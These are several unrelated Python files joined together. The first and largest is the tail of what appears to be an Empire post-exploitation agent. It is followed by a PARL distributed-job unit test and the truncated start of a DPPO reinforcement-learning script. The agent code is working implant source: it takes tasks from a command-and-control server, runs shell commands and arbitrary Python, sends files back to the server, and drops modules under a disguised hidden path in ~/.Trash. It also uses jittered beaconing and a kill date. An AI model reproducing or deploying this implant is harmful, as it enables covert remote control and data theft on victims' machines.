[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
Returns a tuple with (responseName, length, data, remainingData)
Returns a tuple with (responseName, totalPackets, packetNum, resultID, length, data, remainingData)
"""
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = b""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
# dont care about symlinks
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
# directory list
cmdargs = data
path = '/' # default to root
if cmdargs is not None and cmdargs != '' and cmdargs != '/': # strip trailing slash for uniformity
path = cmdargs.rstrip('/')
if path[0] != '/': # always scan relative to root for uniformity
path = '/{0}'.format(path)
if not os.path.isdir(path):
send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
# dynamic code execution, wait for output, don't save outputPicl
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
print("error removing module filed: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
# base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
# base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
# view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
# remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" % (taskingID), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
# check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
# Error out if we can find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 6)
'''
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I", crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 cheack and dec data string
ex. {"crc32" : true, "dec_data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
sys.exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread toinstall our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code, resultID):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code[1:])
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/process Packet start/return the thread
# call the job_func so sys data can be captured
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
# now call the function required
# and capture the output via sys
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = Environment.UserName
# Needed?
group = "Users"
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return Environment.UserName
elif re.compile("hostname").match(command):
return str(socket.gethostname())
elif re.compile("ps").match(command):
myrunspace = Runspaces.RunspaceFactory.CreateRunspace()
myrunspace.Open()
pipeline = myrunspace.CreatePipeline()
pipeline.Commands.AddScript("""
$owners = @{}
Get-WmiObject win32_process | ForEach-Object {$o = $_.getowner(); if(-not $($o.User)) {$o='N/A'} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o}
$p = "*";
$output = Get-Process $p | ForEach-Object {
$arch = 'x64';
if ([System.IntPtr]::Size -eq 4) {
$arch = 'x86';
}
else{
foreach($module in $_.modules) {
if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") {
$arch = 'x86';
break;
}
}
}
$out = New-Object psobject
$out | Add-Member Noteproperty 'ProcessName' $_.ProcessName
$out | Add-Member Noteproperty 'PID' $_.ID
$out | Add-Member Noteproperty 'Arch' $arch
$out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()]
$mem = "{0:N2} MB" -f $($_.WS/1MB)
$out | Add-Member Noteproperty 'MemUsage' $mem
$out
} | Sort-Object -Property PID | ConvertTo-Json;
$output
""")
results = pipeline.Invoke()
buffer = StringIO()
sys.stdout = buffer
for result in results:
print(result)
sys.stdout = sys.__stdout__
return_data = buffer.getvalue()
return return_data
else:
if cmdargs is None:
cmdargs = ''
cmd = "{} {}".format(command, cmdargs)
return os.popen(cmd).read()
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss commnicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
reset_job_test_alone.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.remote.client import disconnect
from parl.utils import logger, _IS_WINDOWS
import os
import threading
import time
import subprocess
@parl.remote_class
class Actor(object):
def __init__(self, arg1=None, arg2=None):
self.arg1 = arg1
self.arg2 = arg2
def get_arg1(self):
return self.arg1
def get_arg2(self):
return self.arg2
def set_arg1(self, value):
self.arg1 = value
def set_arg2(self, value):
self.arg2 = value
def add_one(self, value):
value += 1
return value
def add(self, x, y):
time.sleep(3)
return x + y
def will_raise_exception_func(self):
x = 1 / 0
class TestJobAlone(unittest.TestCase):
def tearDown(self):
disconnect()
def test_job_exit_exceptionally(self):
master = Master(port=1334)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
worker1 = Worker('localhost:1334', 4)
time.sleep(10)
self.assertEqual(worker1.job_buffer.full(), True)
time.sleep(1)
self.assertEqual(master.cpu_num, 4)
print("We are going to kill all the jobs.")
if _IS_WINDOWS:
command = r'''for /F "skip=2 tokens=2 delims=," %a in ('wmic process where "commandline like '%remote\\job.py%'" get processid^,status /format:csv') do taskkill /F /T /pid %a'''
print(os.popen(command).read())
else:
command = (
"ps aux | grep remote/job.py | awk '{print $2}' | xargs kill -9"
)
subprocess.call([command], shell=True)
parl.connect('localhost:1334')
actor = Actor()
self.assertEqual(actor.add_one(1), 2)
time.sleep(20)
master.exit()
worker1.exit()
if __name__ == '__main__':
unittest.main()
|
dppo.py
|
"""
A simple version of OpenAI's Proximal Policy Optimization (PPO). [https://arxiv.org/abs/1707.06347]
Distributing workers in parallel to collect data, then stop worker's roll-out and train PPO on collected data.
Restart workers once PPO is updated.
The global PPO updating rule is adopted from DeepMind's paper (DPPO):
Emergence of Locomotion Behaviours in Rich Environments (Google Deepmind): [https://arxiv.org/abs/1707.02286]
View more on my tutorial website: https://morvanzhou.github.io/tutorials
Dependencies:
tensorflow r1.3
gym 0.9.2
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import gym, threading, queue
EP_MAX = 1000
EP_LEN = 200
N_WORKER = 4 # parallel workers
GAMMA = 0.9 # reward discount factor
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
MIN_BATCH_SIZE = 64 # minimum batch size for updating PPO
UPDATE_STEP = 10 # loop update operation n-steps
EPSILON = 0.2 # for clipping surrogate objective
GAME = 'Pendulum-v0'
S_DIM, A_DIM = 3, 1 # state and action dimension
class PPO(object):
def __init__(self):
self.sess = tf.Session()
self.tfs = tf.placeholder(tf.float32, [None, S_DIM], 'state')
# critic
l1 = tf.layers.dense(self.tfs, 100, tf.nn.relu)
self.v = tf.layers.dense(l1, 1)
self.tfdc_r = tf.placeholder(tf.float32, [None, 1], 'discounted_r')
self.advantage = self.tfdc_r - self.v
self.closs = tf.reduce_mean(tf.square(self.advantage))
self.ctrain_op = tf.train.AdamOptimizer(C_LR).minimize(self.closs)
# actor
pi, pi_params = self._build_anet('pi', trainable=True)
oldpi, oldpi_params = self._build_anet('oldpi', trainable=False)
self.sample_op = tf.squeeze(pi.sample(1), axis=0) # operation of choosing action
self.update_oldpi_op = [oldp.assign(p) for p, oldp in zip(pi_params, oldpi_params)]
self.tfa = tf.placeholder(tf.float32, [None, A_DIM], 'action')
self.tfadv = tf.placeholder(tf.float32, [None, 1], 'advantage')
# ratio = tf.exp(pi.log_prob(self.tfa) - oldpi.log_prob(self.tfa))
ratio = pi.prob(self.tfa) / (oldpi.prob(self.tfa) + 1e-5)
surr = ratio * self.tfadv # surrogate loss
self.aloss = -tf.reduce_mean(tf.minimum( # clipped surrogate objective
surr,
tf.clip_by_value(ratio, 1. - EPSILON, 1. + EPSILON) * self.tfadv))
self.atrain_op = tf.train.AdamOptimizer(A_LR).minimize(self.aloss)
self.sess.run(tf.global_variables_initializer())
def update(self):
global GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
if GLOBAL_EP < EP_MAX:
UPDATE_EVENT.wait() # wait until get batch of data
self.sess.run(self.update_oldpi_op) # copy pi to old pi
data = [QUEUE.get() for _ in range(QUEUE.qsize())] # collect data from all workers
data = np.vstack(data)
s, a, r = data[:, :S_DIM], data[:, S_DIM: S_DIM + A_DIM], data[:, -1:]
adv = self.sess.run(self.advantage, {self.tfs: s, self.tfdc_r: r})
# update actor and critic in a update loop
[self.sess.run(self.atrain_op, {self.tfs: s, self.tfa: a, self.tfadv: adv}) for _ in range(UPDATE_STEP)]
[self.sess.run(self.ctrain_op, {self.tfs: s, self.tfdc_r: r}) for _ in range(UPDATE_STEP)]
UPDATE_EVENT.clear() # updating finished
GLOBAL_UPDATE_COUNTER = 0 # reset counter
ROLLING_EVENT.set() # set roll-out available
def _build_anet(self, name, trainable):
with tf.variable_scope(name):
l1 = tf.layers.dense(self.tfs, 200, tf.nn.relu, trainable=trainable)
mu = 2 * tf.layers.dense(l1, A_DIM, tf.nn.tanh, trainable=trainable)
sigma = tf.layers.dense(l1, A_DIM, tf.nn.softplus, trainable=trainable)
norm_dist = tf.distributions.Normal(loc=mu, scale=sigma)
params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=name)
return norm_dist, params
def choose_action(self, s):
s = s[np.newaxis, :]
a = self.sess.run(self.sample_op, {self.tfs: s})[0]
return np.clip(a, -2, 2)
def get_v(self, s):
if s.ndim < 2: s = s[np.newaxis, :]
return self.sess.run(self.v, {self.tfs: s})[0, 0]
class Worker(object):
def __init__(self, wid):
self.wid = wid
self.env = gym.make(GAME).unwrapped
self.ppo = GLOBAL_PPO
def work(self):
global GLOBAL_EP, GLOBAL_RUNNING_R, GLOBAL_UPDATE_COUNTER
while not COORD.should_stop():
s = self.env.reset()
ep_r = 0
buffer_s, buffer_a, buffer_r = [], [], []
for t in range(EP_LEN):
